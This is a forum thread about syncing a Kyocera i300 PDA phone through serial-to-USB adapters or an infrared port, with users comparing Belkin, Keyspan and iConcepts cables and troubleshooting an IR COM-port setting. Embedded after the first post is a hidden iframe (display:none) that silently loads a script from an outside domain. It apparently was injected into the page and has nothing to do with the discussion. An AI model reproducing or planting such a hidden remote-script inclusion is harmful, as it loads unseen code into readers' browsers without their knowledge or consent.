    USB Synch

There is a serial to USB adpater cable available from iConcepts thats pretty simple - a cable with a serial DB9 on one end, and a USB connector on the other. But, there's a hitch - I could only get it to work with the synch cable, not the cradle.

So, if you want USB synch with the I300, you'll need the synch cable (an additional purchase), plus a PDA to USB adapter.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Belkin and keyspan make a serial to usb that should work on the cradle as well as the cable. however you might have to get the one that does not have the pda only firmware that one retails at most stores for 59.99 coiuld be cheaper on line.

I just got a brand new laptop today, but of course it comes with no serial port. So now I have to use the USB port. I've read all the previous threads on which brands of USB serial adapters work with the i300. Belkin and Keyspan. I've been searching around the Belkin site and they seem to have a couple of usb serial adapters availabLe. Anybody know if they all work with the i300? Or does only 1? I've read that the PDA branded Belkin one does not work. Anybody? I'm thinking of going through to ebay to get one of these because they are freaking expensive. I only plan to use it with my phone so I don't see a point to wasting 60 bucks on it. I've included the links on the bottom so you guys can check them out.

The last one is the PDA branded one. What I'm thinking is that they are all the same adapters except that one has more slots than the others, etc. What do you guys think?

If you're using a laptop, sync with the IR port... it's a bit slower than serial, but you don't have to lug the cradle around or shell out extra moola on a cable...

    Hotsync using IR

I've tried setting up to do Hotsyncs using IR, but without success. The Hotsync software wants me to specify a COM port for my IR device on my laptop but the IR device in the Control Panel just says it's located on a "generic bus". What am I missing?
